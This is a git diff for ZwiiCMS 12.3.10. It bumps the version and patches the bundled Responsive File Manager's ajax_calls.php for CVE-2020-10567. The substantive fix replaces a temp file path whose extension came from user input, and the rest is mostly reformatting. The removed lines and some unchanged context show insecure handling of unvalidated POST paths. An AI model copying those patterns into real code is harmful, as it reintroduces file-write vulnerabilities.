diff --git a/CHANGES.md b/CHANGES.md
index 3a9aa4f2..43a34f1f 100755
--- a/CHANGES.md
+++ b/CHANGES.md
@@ -1,5 +1,9 @@
 # Changelog
 
+## Version 12.3.10
+- Mise à jour du fichier dialog.php de Responsive File Manager
+- Vulnérabilité dans ajax_call.php CVE-2020-10567
+
 ## Version 12.3.09
 ### Corrections
 - Corrige le filtrage des modules orphelins.
diff --git a/LISEZMOI.md b/LISEZMOI.md
index cdade332..d9dd689d 100644
--- a/LISEZMOI.md
+++ b/LISEZMOI.md
@@ -1,4 +1,4 @@
-# ZwiiCMS 12.3.09
+# ZwiiCMS 12.3.10
 
 Zwii est un CMS sans base de données (flat-file) qui permet de créer et gérer facilement un site web sans aucune connaissance en programmation.
 
diff --git a/README.md b/README.md
index 5f712850..a44bcf0d 100755
--- a/README.md
+++ b/README.md
@@ -1,4 +1,4 @@
-# ZwiiCMS 12.3.09
+# ZwiiCMS 12.3.10
 
 Zwii is a database-less (flat-file) CMS that allows you to easily create and manage a web site without any programming knowledge.
 
diff --git a/core/core.php b/core/core.php
index 25d86874..d374b7f8 100644
--- a/core/core.php
+++ b/core/core.php
@@ -53,7 +53,7 @@ class common
 	const ACCESS_TIMER = 1800;
 
 	// Numéro de version et branche pour l'auto-update
-	const ZWII_VERSION = '12.3.09';
+	const ZWII_VERSION = '12.3.10';
 
 	// URL autoupdate
 	const ZWII_UPDATE_URL = 'https://forge.chapril.org/ZwiiCMS-Team/update/raw/branch/master/';
diff --git a/core/vendor/filemanager/ajax_calls.php b/core/vendor/filemanager/ajax_calls.php
index e514186d..6b97f280 100644
--- a/core/vendor/filemanager/ajax_calls.php
+++ b/core/vendor/filemanager/ajax_calls.php
@@ -5,7 +5,7 @@ $config = include 'config/config.php';
 require_once 'include/utils.php';
 
 if ($_SESSION['RF']["verify"] != "RESPONSIVEfilemanager") {
-    response(trans('forbidden').AddErrorLocation())->send();
+    response(trans('forbidden') . AddErrorLocation())->send();
     exit;
 }
 $languages = include 'lang/languages.php';
@@ -14,24 +14,24 @@ if (isset($_SESSION['RF']['language']) && file_exists('lang/' . basename($_SESSI
     if (array_key_exists($_SESSION['RF']['language'], $languages)) {
         include 'lang/' . basename($_SESSION['RF']['language']) . '.php';
     } else {
-        response(trans('Lang_Not_Found').AddErrorLocation())->send();
+        response(trans('Lang_Not_Found') . AddErrorLocation())->send();
         exit;
     }
 } else {
-    response(trans('Lang_Not_Found').AddErrorLocation())->send();
+    response(trans('Lang_Not_Found') . AddErrorLocation())->send();
     exit;
 }
 
 
 //check $_GET['file']
 if (isset($_GET['file']) && !checkRelativePath($_GET['file'])) {
-    response(trans('wrong path').AddErrorLocation())->send();
+    response(trans('wrong path') . AddErrorLocation())->send();
     exit;
 }
 
 //check $_POST['file']
-if(isset($_POST['path']) && !checkRelativePath($_POST['path'])) {
-    response(trans('wrong path').AddErrorLocation())->send();
+if (isset($_POST['path']) && !checkRelativePath($_POST['path'])) {
+    response(trans('wrong path') . AddErrorLocation())->send();
     exit;
 }
 
@@ -43,16 +43,16 @@ if (isset($_GET['action'])) {
         case 'new_file_form':
             echo trans('Filename') . ': <input type="text" id="create_text_file_name" style="height:30px"> <select id="create_text_file_extension" style="margin:0;width:100px;">';
             foreach ($config['editable_text_file_exts'] as $ext) {
-                echo '<option value=".'.$ext.'">.'.$ext.'</option>';
+                echo '<option value=".' . $ext . '">.' . $ext . '</option>';
             }
             echo '</select><br><hr><textarea id="textfile_create_area" style="width:100%;height:150px;"></textarea>';
-        break;
+            break;
 
         case 'view':
             if (isset($_GET['type'])) {
                 $_SESSION['RF']["view_type"] = $_GET['type'];
             } else {
-                response(trans('view type number missing').AddErrorLocation())->send();
+                response(trans('view type number missing') . AddErrorLocation())->send();
                 exit;
             }
             break;
@@ -63,7 +63,7 @@ if (isset($_GET['action'])) {
                     $_SESSION['RF']["filter"] = $_GET['type'];
                 }
             } else {
-                response(trans('view type number missing').AddErrorLocation())->send();
+                response(trans('view type number missing') . AddErrorLocation())->send();
                 exit;
             }
             break;
@@ -73,15 +73,13 @@ if (isset($_GET['action'])) {
                 $_SESSION['RF']["sort_by"] = $_GET['sort_by'];
             }
 
-			if (isset($_GET['descending']))
-			{
-				$_SESSION['RF']["descending"] = $_GET['descending'];
-			}
-			break;
-		case 'save_img':
-			$info = pathinfo($_POST['name']);
+            if (isset($_GET['descending'])) {
+                $_SESSION['RF']["descending"] = $_GET['descending'];
+            }
+            break;
+        case 'save_img':
+            $info = pathinfo($_POST['name']);
             $image_data = $_POST['url'];
-
             if (preg_match('/^data:image\/(\w+);base64,/', $image_data, $type)) {
                 $image_data = substr($image_data, strpos($image_data, ',') + 1);
                 $type = strtolower($type[1]); // jpg, png, gif
@@ -89,42 +87,43 @@ if (isset($_GET['action'])) {
                 $image_data = base64_decode($image_data);
 
                 if ($image_data === false) {
-                    response(trans('TUI_Decode_Failed').AddErrorLocation())->send();
-                exit;
+                    response(trans('TUI_Decode_Failed') . AddErrorLocation())->send();
+                    exit;
                 }
             } else {
-                response(trans('').AddErrorLocation())->send();
+                response(trans('') . AddErrorLocation())->send();
                 exit;
             }
 
             if ($image_data === false) {
-                response(trans('').AddErrorLocation())->send();
+                response(trans('') . AddErrorLocation())->send();
                 exit;
             }
 
             if (!checkresultingsize(strlen($image_data))) {
-                response(sprintf(trans('max_size_reached'), $config['MaxSizeTotal']).AddErrorLocation())->send();
+                response(sprintf(trans('max_size_reached'), $config['MaxSizeTotal']) . AddErrorLocation())->send();
                 exit;
             }
+
             if ($ftp) {
-                $temp = tempnam('/tmp', 'RF');
-                unlink($temp);
-                $temp .=".".substr(strrchr($_POST['url'], '.'), 1);
-                file_put_contents($temp, $image_data);
+                $temp_file = tmpfile();
+                $temp_meta = stream_get_meta_data($temp_file);
+                $temp_path = $temp_meta['uri'];
+                fwrite($temp_file, $image_data);
 
-                $ftp->put($config['ftp_base_folder'].$config['upload_dir'] . $_POST['path'] . $_POST['name'], $temp, FTP_BINARY);
+                $ftp->put($config['ftp_base_folder'] . $config['upload_dir'] . $_POST['path'] . $_POST['name'], $temp_path, FTP_BINARY);
 
-                create_img($temp, $temp, 122, 91);
-                $ftp->put($config['ftp_base_folder'].$config['ftp_thumbs_dir']. $_POST['path'] . $_POST['name'], $temp, FTP_BINARY);
+                create_img($temp_path, $temp_path, 122, 91);
+                $ftp->put($config['ftp_base_folder'] . $config['ftp_thumbs_dir'] . $_POST['path'] . $_POST['name'], $temp_path, FTP_BINARY);
 
-                unlink($temp);
+                fclose($temp_file);
             } else {
                 file_put_contents($config['current_path'] . $_POST['path'] . $_POST['name'], $image_data);
-                create_img($config['current_path'] . $_POST['path'] . $_POST['name'], $config['thumbs_base_path'].$_POST['path'].$_POST['name'], 122, 91);
+                create_img($config['current_path'] . $_POST['path'] . $_POST['name'], $config['thumbs_base_path'] . $_POST['path'] . $_POST['name'], 122, 91);
                 // TODO something with this function cause its blowing my mind
                 new_thumbnails_creation(
-                    $config['current_path'].$_POST['path'],
-                    $config['current_path'].$_POST['path'].$_POST['name'],
+                    $config['current_path'] . $_POST['path'],
+                    $config['current_path'] . $_POST['path'] . $_POST['name'],
                     $_POST['name'],
                     $config['current_path'],
                     $config
@@ -134,11 +133,11 @@ if (isset($_GET['action'])) {
 
         case 'extract':
             if (!$config['extract_files']) {
-                response(trans('wrong action').AddErrorLocation())->send();
+                response(trans('wrong action') . AddErrorLocation())->send();
             }
             if ($ftp) {
-                $path = $config['ftp_base_url'].$config['upload_dir'] . $_POST['path'];
-                $base_folder = $config['ftp_base_url'].$config['upload_dir'] . fix_dirname($_POST['path']) . "/";
+                $path = $config['ftp_base_url'] . $config['upload_dir'] . $_POST['path'];
+                $base_folder = $config['ftp_base_url'] . $config['upload_dir'] . fix_dirname($_POST['path']) . "/";
             } else {
                 $path = $config['current_path'] . $_POST['path'];
                 $base_folder = $config['current_path'] . fix_dirname($_POST['path']) . "/";
@@ -171,7 +170,7 @@ if (isset($_GET['action'])) {
                             $sizeTotalFinal += $aStat['size'];
                         }
                         if (!checkresultingsize($sizeTotalFinal)) {
-                            response(sprintf(trans('max_size_reached'), $config['MaxSizeTotal']).AddErrorLocation())->send();
+                            response(sprintf(trans('max_size_reached'), $config['MaxSizeTotal']) . AddErrorLocation())->send();
                             exit;
                         }
 
@@ -184,7 +183,7 @@ if (isset($_GET['action'])) {
                                     create_folder($base_folder . $FullFileName['name']);
                                 }
 
-                                if (! (substr($FullFileName['name'], -1, 1) == "/")) {
+                                if (!(substr($FullFileName['name'], -1, 1) == "/")) {
                                     $fileinfo = pathinfo($FullFileName['name']);
                                     if (in_array(strtolower($fileinfo['extension']), $config['ext'])) {
                                         copy('zip://' . $path . '#' . $FullFileName['name'], $base_folder . $FullFileName['name']);
@@ -194,7 +193,7 @@ if (isset($_GET['action'])) {
                         }
                         $zip->close();
                     } else {
-                        response(trans('Zip_No_Extract').AddErrorLocation())->send();
+                        response(trans('Zip_No_Extract') . AddErrorLocation())->send();
                         exit;
                     }
 
@@ -217,127 +216,132 @@ if (isset($_GET['action'])) {
                     break;
 
                 default:
-                    response(trans('Zip_Invalid').AddErrorLocation())->send();
+                    response(trans('Zip_Invalid') . AddErrorLocation())->send();
                     exit;
             }
 
             if ($ftp) {
                 unlink($path);
-                $ftp->putAll($base_folder, "/".$config['ftp_base_folder'] . $config['upload_dir'] . fix_dirname($_POST['path']), FTP_BINARY);
+                $ftp->putAll($base_folder, "/" . $config['ftp_base_folder'] . $config['upload_dir'] . fix_dirname($_POST['path']), FTP_BINARY);
                 deleteDir($base_folder);
             }
 
 
-			break;
-		case 'media_preview':
-			if(isset($_GET['file'])){
-				$_GET['file'] = sanitize($_GET['file']);
-			}
-			if(isset($_GET['title'])){
-				$_GET['title'] = sanitize($_GET['title']);
-			}
-			if($ftp){
-				$preview_file = $config['ftp_base_url'].$config['upload_dir'] . $_GET['file'];
-			}else{
-				$preview_file = $config['current_path'] . $_GET["file"];
-			}
-			$info = pathinfo($preview_file);
-			ob_start();
-			?>
-			<div id="jp_container_1" class="jp-video" style="margin:0 auto;">
-				<div class="jp-type-single">
-				<div id="jquery_jplayer_1" class="jp-jplayer"></div>
-				<div class="jp-gui">
-					<div class="jp-video-play">
-					<a href="javascript:;" class="jp-video-play-icon" tabindex="1">play</a>
-					</div>
-					<div class="jp-interface">
-					<div class="jp-progress">
-						<div class="jp-seek-bar">
-						<div class="jp-play-bar"></div>
-						</div>
-					</div>
-					<div class="jp-current-time"></div>
-					<div class="jp-duration"></div>
-					<div class="jp-controls-holder">
-						<ul class="jp-controls">
-						<li><a href="javascript:;" class="jp-play" tabindex="1">play</a></li>
-						<li><a href="javascript:;" class="jp-pause" tabindex="1">pause</a></li>
-						<li><a href="javascript:;" class="jp-stop" tabindex="1">stop</a></li>
-						<li><a href="javascript:;" class="jp-mute" tabindex="1" title="mute">mute</a></li>
-						<li><a href="javascript:;" class="jp-unmute" tabindex="1" title="unmute">unmute</a></li>
-						<li><a href="javascript:;" class="jp-volume-max" tabindex="1" title="max volume">max volume</a></li>
-						</ul>
-						<div class="jp-volume-bar">
-						<div class="jp-volume-bar-value"></div>
-						</div>
-						<ul class="jp-toggles">
-						<li><a href="javascript:;" class="jp-full-screen" tabindex="1" title="full screen">full screen</a></li>
-						<li><a href="javascript:;" class="jp-restore-screen" tabindex="1" title="restore screen">restore screen</a></li>
-						<li><a href="javascript:;" class="jp-repeat" tabindex="1" title="repeat">repeat</a></li>
-						<li><a href="javascript:;" class="jp-repeat-off" tabindex="1" title="repeat off">repeat off</a></li>
-						</ul>
-					</div>
-					<div class="jp-title" style="display:none;">
-						<ul>
-						<li></li>
-						</ul>
-					</div>
-					</div>
-				</div>
-				<div class="jp-no-solution">
-					<span>Update Required</span>
-					To play the media you will need to either update your browser to a recent version or update your <a href="https://get.adobe.com/flashplayer/" target="_blank">Flash plugin</a>.
-				</div>
-				</div>
-			</div>
-			<?php if(in_array(strtolower($info['extension']), $config['ext_music'])): ?>
+            break;
+        case 'media_preview':
+            if (isset($_GET['file'])) {
+                $_GET['file'] = sanitize($_GET['file']);
+            }
+            if (isset($_GET['title'])) {
+                $_GET['title'] = sanitize($_GET['title']);
+            }
+            if ($ftp) {
+                $preview_file = $config['ftp_base_url'] . $config['upload_dir'] . $_GET['file'];
+            } else {
+                $preview_file = $config['current_path'] . $_GET["file"];
+            }
+            $info = pathinfo($preview_file);
+            ob_start();
+            ?>
+            <div id="jp_container_1" class="jp-video" style="margin:0 auto;">
+                <div class="jp-type-single">
+                    <div id="jquery_jplayer_1" class="jp-jplayer"></div>
+                    <div class="jp-gui">
+                        <div class="jp-video-play">
+                            <a href="javascript:;" class="jp-video-play-icon" tabindex="1">play</a>
+                        </div>
+                        <div class="jp-interface">
+                            <div class="jp-progress">
+                                <div class="jp-seek-bar">
+                                    <div class="jp-play-bar"></div>
+                                </div>
+                            </div>
+                            <div class="jp-current-time"></div>
+                            <div class="jp-duration"></div>
+                            <div class="jp-controls-holder">
+                                <ul class="jp-controls">
+                                    <li><a href="javascript:;" class="jp-play" tabindex="1">play</a></li>
+                                    <li><a href="javascript:;" class="jp-pause" tabindex="1">pause</a></li>
+                                    <li><a href="javascript:;" class="jp-stop" tabindex="1">stop</a></li>
+                                    <li><a href="javascript:;" class="jp-mute" tabindex="1" title="mute">mute</a></li>
+                                    <li><a href="javascript:;" class="jp-unmute" tabindex="1" title="unmute">unmute</a></li>
+                                    <li><a href="javascript:;" class="jp-volume-max" tabindex="1" title="max volume">max volume</a>
+                                    </li>
+                                </ul>
+                                <div class="jp-volume-bar">
+                                    <div class="jp-volume-bar-value"></div>
+                                </div>
+                                <ul class="jp-toggles">
+                                    <li><a href="javascript:;" class="jp-full-screen" tabindex="1" title="full screen">full
+                                            screen</a></li>
+                                    <li><a href="javascript:;" class="jp-restore-screen" tabindex="1" title="restore screen">restore
+                                            screen</a></li>
+                                    <li><a href="javascript:;" class="jp-repeat" tabindex="1" title="repeat">repeat</a></li>
+                                    <li><a href="javascript:;" class="jp-repeat-off" tabindex="1" title="repeat off">repeat off</a>
+                                    </li>
+                                </ul>
+                            </div>
+                            <div class="jp-title" style="display:none;">
+                                <ul>
+                                    <li></li>
+                                </ul>
+                            </div>
+                        </div>
+                    </div>
+                    <div class="jp-no-solution">
+                        <span>Update Required</span>
+                        To play the media you will need to either update your browser to a recent version or update your <a
+                            href="https://get.adobe.com/flashplayer/" target="_blank">Flash plugin</a>.
+                    </div>
+                </div>
+            </div>
+            <?php if (in_array(strtolower($info['extension']), $config['ext_music'])): ?>
 
-            <script type="text/javascript">
-                $(document).ready(function () {
+                <script type="text/javascript">
+                    $(document).ready(function () {
 
-                    $("#jquery_jplayer_1").jPlayer({
-                        ready: function () {
-                            $(this).jPlayer("setMedia", {
-                                title: "<?php $_GET['title']; ?>",
-                                mp3: "<?php echo $preview_file; ?>",
-                                m4a: "<?php echo $preview_file; ?>",
-                                oga: "<?php echo $preview_file; ?>",
-                                wav: "<?php echo $preview_file; ?>"
-                            });
-                        },
-                        swfPath: "js",
-                        solution: "html,flash",
-                        supplied: "mp3, m4a, midi, mid, oga,webma, ogg, wav",
-                        smoothPlayBar: true,
-                        keyEnabled: false
+                        $("#jquery_jplayer_1").jPlayer({
+                            ready: function () {
+                                $(this).jPlayer("setMedia", {
+                                    title: "<?php $_GET['title']; ?>",
+                                    mp3: "<?php echo $preview_file; ?>",
+                                    m4a: "<?php echo $preview_file; ?>",
+                                    oga: "<?php echo $preview_file; ?>",
+                                    wav: "<?php echo $preview_file; ?>"
+                                });
+                            },
+                            swfPath: "js",
+                            solution: "html,flash",
+                            supplied: "mp3, m4a, midi, mid, oga,webma, ogg, wav",
+                            smoothPlayBar: true,
+                            keyEnabled: false
+                        });
                     });
-                });
-            </script>
+                </script>
 
-            <?php elseif (in_array(strtolower($info['extension']), $config['ext_video'])):	?>
+            <?php elseif (in_array(strtolower($info['extension']), $config['ext_video'])): ?>
 
-            <script type="text/javascript">
-                $(document).ready(function () {
+                <script type="text/javascript">
+                    $(document).ready(function () {
+
+                        $("#jquery_jplayer_1").jPlayer({
+                            ready: function () {
+                                $(this).jPlayer("setMedia", {
+                                    title: "<?php $_GET['title']; ?>",
+                                    m4v: "<?php echo $preview_file; ?>",
+                                    ogv: "<?php echo $preview_file; ?>",
+                                    flv: "<?php echo $preview_file; ?>"
+                                });
+                            },
+                            swfPath: "js",
+                            solution: "html,flash",
+                            supplied: "mp4, m4v, ogv, flv, webmv, webm",
+                            smoothPlayBar: true,
+                            keyEnabled: false
+                        });
 
-                    $("#jquery_jplayer_1").jPlayer({
-                        ready: function () {
-                            $(this).jPlayer("setMedia", {
-                                title: "<?php $_GET['title']; ?>",
-                                m4v: "<?php echo $preview_file; ?>",
-                                ogv: "<?php echo $preview_file; ?>",
-                                flv: "<?php echo $preview_file; ?>"
-                            });
-                        },
-                        swfPath: "js",
-                        solution: "html,flash",
-                        supplied: "mp4, m4v, ogv, flv, webmv, webm",
-                        smoothPlayBar: true,
-                        keyEnabled: false
                     });
-
-                });
-            </script>
+                </script>
 
             <?php endif;
 
@@ -349,12 +353,12 @@ if (isset($_GET['action'])) {
             break;
         case 'copy_cut':
             if ($_POST['sub_action'] != 'copy' && $_POST['sub_action'] != 'cut') {
-                response(trans('wrong sub-action').AddErrorLocation())->send();
+                response(trans('wrong sub-action') . AddErrorLocation())->send();
                 exit;
             }
 
             if (trim($_POST['path']) == '') {
-                response(trans('no path').AddErrorLocation())->send();
+                response(trans('no path') . AddErrorLocation())->send();
                 exit;
             }
 
@@ -364,7 +368,7 @@ if (isset($_GET['action'])) {
             if (is_dir($path)) {
                 // can't copy/cut dirs
                 if ($config['copy_cut_dirs'] === false) {
-                    response(sprintf(trans('Copy_Cut_Not_Allowed'), $msg_sub_action, trans('Folders')).AddErrorLocation())->send();
+                    response(sprintf(trans('Copy_Cut_Not_Allowed'), $msg_sub_action, trans('Folders')) . AddErrorLocation())->send();
                     exit;
                 }
 
@@ -372,7 +376,7 @@ if (isset($_GET['action'])) {
                 // size over limit
                 if ($config['copy_cut_max_size'] !== false && is_int($config['copy_cut_max_size'])) {
                     if (($config['copy_cut_max_size'] * 1024 * 1024) < $sizeFolderToCopy) {
-                        response(sprintf(trans('Copy_Cut_Size_Limit'), $msg_sub_action, $config['copy_cut_max_size']).AddErrorLocation())->send();
+                        response(sprintf(trans('Copy_Cut_Size_Limit'), $msg_sub_action, $config['copy_cut_max_size']) . AddErrorLocation())->send();
                         exit;
                     }
                 }
@@ -380,19 +384,19 @@ if (isset($_GET['action'])) {
                 // file count over limit
                 if ($config['copy_cut_max_count'] !== false && is_int($config['copy_cut_max_count'])) {
                     if ($config['copy_cut_max_count'] < $fileNum) {
-                        response(sprintf(trans('Copy_Cut_Count_Limit'), $msg_sub_action, $config['copy_cut_max_count']).AddErrorLocation())->send();
+                        response(sprintf(trans('Copy_Cut_Count_Limit'), $msg_sub_action, $config['copy_cut_max_count']) . AddErrorLocation())->send();
                         exit;
                     }
                 }
 
                 if (!checkresultingsize($sizeFolderToCopy)) {
-                    response(sprintf(trans('max_size_reached'), $config['MaxSizeTotal']).AddErrorLocation())->send();
+                    response(sprintf(trans('max_size_reached'), $config['MaxSizeTotal']) . AddErrorLocation())->send();
                     exit;
                 }
             } else {
                 // can't copy/cut files
                 if ($config['copy_cut_files'] === false) {
-                    response(sprintf(trans('Copy_Cut_Not_Allowed'), $msg_sub_action, trans('Files')).AddErrorLocation())->send();
+                    response(sprintf(trans('Copy_Cut_Not_Allowed'), $msg_sub_action, trans('Files')) . AddErrorLocation())->send();
                     exit;
                 }
             }
@@ -408,10 +412,11 @@ if (isset($_GET['action'])) {
             if ($ftp) {
                 $path = $config['ftp_base_url'] . $config['upload_dir'] . $_POST['path'];
                 if (
-                    ($_POST['folder']==1 && $config['chmod_dirs'] === false)
-                    || ($_POST['folder']==0 && $config['chmod_files'] === false)
-                    || (is_function_callable("chmod") === false)) {
-                    response(sprintf(trans('File_Permission_Not_Allowed'), (is_dir($path) ? trans('Folders') : trans('Files')), 403).AddErrorLocation())->send();
+                    ($_POST['folder'] == 1 && $config['chmod_dirs'] === false)
+                    || ($_POST['folder'] == 0 && $config['chmod_files'] === false)
+                    || (is_function_callable("chmod") === false)
+                ) {
+                    response(sprintf(trans('File_Permission_Not_Allowed'), (is_dir($path) ? trans('Folders') : trans('Files')), 403) . AddErrorLocation())->send();
                     exit;
                 }
                 $info = $_POST['permissions'];
@@ -420,8 +425,9 @@ if (isset($_GET['action'])) {
                 if (
                     (is_dir($path) && $config['chmod_dirs'] === false)
                     || (is_file($path) && $config['chmod_files'] === false)
-                    || (is_function_callable("chmod") === false)) {
-                    response(sprintf(trans('File_Permission_Not_Allowed'), (is_dir($path) ? trans('Folders') : trans('Files')), 403).AddErrorLocation())->send();
+                    || (is_function_callable("chmod") === false)
+                ) {
+                    response(sprintf(trans('File_Permission_Not_Allowed'), (is_dir($path) ? trans('Folders') : trans('Files')), 403) . AddErrorLocation())->send();
                     exit;
                 }
 
@@ -433,22 +439,22 @@ if (isset($_GET['action'])) {
                 $info .= (($perms & 0x0100) ? 'r' : '-');
                 $info .= (($perms & 0x0080) ? 'w' : '-');
                 $info .= (($perms & 0x0040) ?
-                            (($perms & 0x0800) ? 's' : 'x') :
-                            (($perms & 0x0800) ? 'S' : '-'));
+                    (($perms & 0x0800) ? 's' : 'x') :
+                    (($perms & 0x0800) ? 'S' : '-'));
 
                 // Group
                 $info .= (($perms & 0x0020) ? 'r' : '-');
                 $info .= (($perms & 0x0010) ? 'w' : '-');
                 $info .= (($perms & 0x0008) ?
-                            (($perms & 0x0400) ? 's' : 'x') :
-                            (($perms & 0x0400) ? 'S' : '-'));
+                    (($perms & 0x0400) ? 's' : 'x') :
+                    (($perms & 0x0400) ? 'S' : '-'));
 
                 // World
                 $info .= (($perms & 0x0004) ? 'r' : '-');
                 $info .= (($perms & 0x0002) ? 'w' : '-');
                 $info .= (($perms & 0x0001) ?
-                            (($perms & 0x0200) ? 't' : 'x') :
-                            (($perms & 0x0200) ? 'T' : '-'));
+                    (($perms & 0x0200) ? 't' : 'x') :
+                    (($perms & 0x0200) ? 'T' : '-'));
             }
 
 
@@ -465,22 +471,22 @@ if (isset($_GET['action'])) {
                     </thead>
                     <tbody>
                         <tr>
-                            <td>'.trans('User').'</td>
-                            <td><input id="u_4" type="checkbox" data-value="4" data-group="user" '.(substr($info, 1, 1)=='r' ? " checked" : "").'></td>
-                            <td><input id="u_2" type="checkbox" data-value="2" data-group="user" '.(substr($info, 2, 1)=='w' ? " checked" : "").'></td>
-                            <td><input id="u_1" type="checkbox" data-value="1" data-group="user" '.(substr($info, 3, 1)=='x' ? " checked" : "").'></td>
+                            <td>' . trans('User') . '</td>
+                            <td><input id="u_4" type="checkbox" data-value="4" data-group="user" ' . (substr($info, 1, 1) == 'r' ? " checked" : "") . '></td>
+                            <td><input id="u_2" type="checkbox" data-value="2" data-group="user" ' . (substr($info, 2, 1) == 'w' ? " checked" : "") . '></td>
+                            <td><input id="u_1" type="checkbox" data-value="1" data-group="user" ' . (substr($info, 3, 1) == 'x' ? " checked" : "") . '></td>
                         </tr>
                         <tr>
-                            <td>'.trans('Group').'</td>
-                            <td><input id="g_4" type="checkbox" data-value="4" data-group="group" '.(substr($info, 4, 1)=='r' ? " checked" : "").'></td>
-                            <td><input id="g_2" type="checkbox" data-value="2" data-group="group" '.(substr($info, 5, 1)=='w' ? " checked" : "").'></td>
-                            <td><input id="g_1" type="checkbox" data-value="1" data-group="group" '.(substr($info, 6, 1)=='x' ? " checked" : "").'></td>
+                            <td>' . trans('Group') . '</td>
+                            <td><input id="g_4" type="checkbox" data-value="4" data-group="group" ' . (substr($info, 4, 1) == 'r' ? " checked" : "") . '></td>
+                            <td><input id="g_2" type="checkbox" data-value="2" data-group="group" ' . (substr($info, 5, 1) == 'w' ? " checked" : "") . '></td>
+                            <td><input id="g_1" type="checkbox" data-value="1" data-group="group" ' . (substr($info, 6, 1) == 'x' ? " checked" : "") . '></td>
                         </tr>
                         <tr>
-                            <td>'.trans('All').'</td>
-                            <td><input id="a_4" type="checkbox" data-value="4" data-group="all" '.(substr($info, 7, 1)=='r' ? " checked" : "").'></td>
-                            <td><input id="a_2" type="checkbox" data-value="2" data-group="all" '.(substr($info, 8, 1)=='w' ? " checked" : "").'></td>
-                            <td><input id="a_1" type="checkbox" data-value="1" data-group="all" '.(substr($info, 9, 1)=='x' ? " checked" : "").'></td>
+                            <td>' . trans('All') . '</td>
+                            <td><input id="a_4" type="checkbox" data-value="4" data-group="all" ' . (substr($info, 7, 1) == 'r' ? " checked" : "") . '></td>
+                            <td><input id="a_2" type="checkbox" data-value="2" data-group="all" ' . (substr($info, 8, 1) == 'w' ? " checked" : "") . '></td>
+                            <td><input id="a_1" type="checkbox" data-value="1" data-group="all" ' . (substr($info, 9, 1) == 'x' ? " checked" : "") . '></td>
                         </tr>
                         <tr>
                             <td></td>
@@ -490,12 +496,12 @@ if (isset($_GET['action'])) {
                 </table>';
 
             if ((!$ftp && is_dir($path))) {
-                $ret .= '<div class="hero-unit" style="padding:10px;">'.trans('File_Permission_Recursive').'<br/><br/>
+                $ret .= '<div class="hero-unit" style="padding:10px;">' . trans('File_Permission_Recursive') . '<br/><br/>
                         <ul class="unstyled">
-                            <li><label class="radio"><input value="none" name="apply_recursive" type="radio" checked> '.trans('No').'</label></li>
-                            <li><label class="radio"><input value="files" name="apply_recursive" type="radio"> '.trans('Files').'</label></li>
-                            <li><label class="radio"><input value="folders" name="apply_recursive" type="radio"> '.trans('Folders').'</label></li>
-                            <li><label class="radio"><input value="both" name="apply_recursive" type="radio"> '.trans('Files').' & '.trans('Folders').'</label></li>
+                            <li><label class="radio"><input value="none" name="apply_recursive" type="radio" checked> ' . trans('No') . '</label></li>
+                            <li><label class="radio"><input value="files" name="apply_recursive" type="radio"> ' . trans('Files') . '</label></li>
+                            <li><label class="radio"><input value="folders" name="apply_recursive" type="radio"> ' . trans('Folders') . '</label></li>
+                            <li><label class="radio"><input value="both" name="apply_recursive" type="radio"> ' . trans('Files') . ' & ' . trans('Folders') . '</label></li>
                         </ul>
                         </div>';
             }
@@ -507,14 +513,14 @@ if (isset($_GET['action'])) {
 
             break;
         case 'get_lang':
-            if (! file_exists('lang/languages.php')) {
-                response(trans('Lang_Not_Found').AddErrorLocation())->send();
+            if (!file_exists('lang/languages.php')) {
+                response(trans('Lang_Not_Found') . AddErrorLocation())->send();
                 exit;
             }
 
             $languages = include 'lang/languages.php';
-            if (! isset($languages) || ! is_array($languages)) {
-                response(trans('Lang_Not_Found').AddErrorLocation())->send();
+            if (!isset($languages) || !is_array($languages)) {
+                response(trans('Lang_Not_Found') . AddErrorLocation())->send();
                 exit;
             }
 
@@ -531,11 +537,11 @@ if (isset($_GET['action'])) {
 
             break;
         case 'change_lang':
-            $choosen_lang = (!empty($_POST['choosen_lang']))? $_POST['choosen_lang']:"en_EN";
+            $choosen_lang = (!empty($_POST['choosen_lang'])) ? $_POST['choosen_lang'] : "en_EN";
 
             if (array_key_exists($choosen_lang, $languages)) {
-                if (! file_exists('lang/' . $choosen_lang . '.php')) {
-                    response(trans('Lang_Not_Found').AddErrorLocation())->send();
+                if (!file_exists('lang/' . $choosen_lang . '.php')) {
+                    response(trans('Lang_Not_Found') . AddErrorLocation())->send();
                     exit;
                 } else {
                     $_SESSION['RF']['language'] = $choosen_lang;
@@ -545,12 +551,12 @@ if (isset($_GET['action'])) {
             break;
         case 'cad_preview':
             if ($ftp) {
-                $selected_file = $config['ftp_base_url'].$config['upload_dir'] . $_GET['file'];
+                $selected_file = $config['ftp_base_url'] . $config['upload_dir'] . $_GET['file'];
             } else {
                 $selected_file = $config['current_path'] . $_GET['file'];
 
-                if (! file_exists($selected_file)) {
-                    response(trans('File_Not_Found').AddErrorLocation())->send();
+                if (!file_exists($selected_file)) {
+                    response(trans('File_Not_Found') . AddErrorLocation())->send();
                     exit;
                 }
             }
@@ -570,17 +576,17 @@ if (isset($_GET['action'])) {
             $preview_mode = $_GET["preview_mode"];
 
             if ($sub_action != 'preview' && $sub_action != 'edit') {
-                response(trans('wrong action').AddErrorLocation())->send();
+                response(trans('wrong action') . AddErrorLocation())->send();
                 exit;
             }
 
             if ($ftp) {
-                $selected_file = ($sub_action == 'preview' ? $config['ftp_base_url'].$config['upload_dir'] . $_GET['file'] : $config['ftp_base_url'].$config['upload_dir'] . $_POST['path']);
+                $selected_file = ($sub_action == 'preview' ? $config['ftp_base_url'] . $config['upload_dir'] . $_GET['file'] : $config['ftp_base_url'] . $config['upload_dir'] . $_POST['path']);
             } else {
                 $selected_file = ($sub_action == 'preview' ? $config['current_path'] . $_GET['file'] : $config['current_path'] . $_POST['path']);
 
-                if (! file_exists($selected_file)) {
-                    response(trans('File_Not_Found').AddErrorLocation())->send();
+                if (!file_exists($selected_file)) {
+                    response(trans('File_Not_Found') . AddErrorLocation())->send();
                     exit;
                 }
             }
@@ -595,19 +601,20 @@ if (isset($_GET['action'])) {
                 $allowed_file_exts = $config['googledoc_file_exts'];
             }
 
-            if (! isset($allowed_file_exts) || ! is_array($allowed_file_exts)) {
+            if (!isset($allowed_file_exts) || !is_array($allowed_file_exts)) {
                 $allowed_file_exts = array();
             }
 
             if (!isset($info['extension'])) {
-                $info['extension']='';
+                $info['extension'] = '';
             }
-            if (! in_array($info['extension'], $allowed_file_exts)
-                || ! isset($is_allowed)
+            if (
+                !in_array($info['extension'], $allowed_file_exts)
+                || !isset($is_allowed)
                 || $is_allowed === false
-                || (!$ftp && ! is_readable($selected_file))
+                || (!$ftp && !is_readable($selected_file))
             ) {
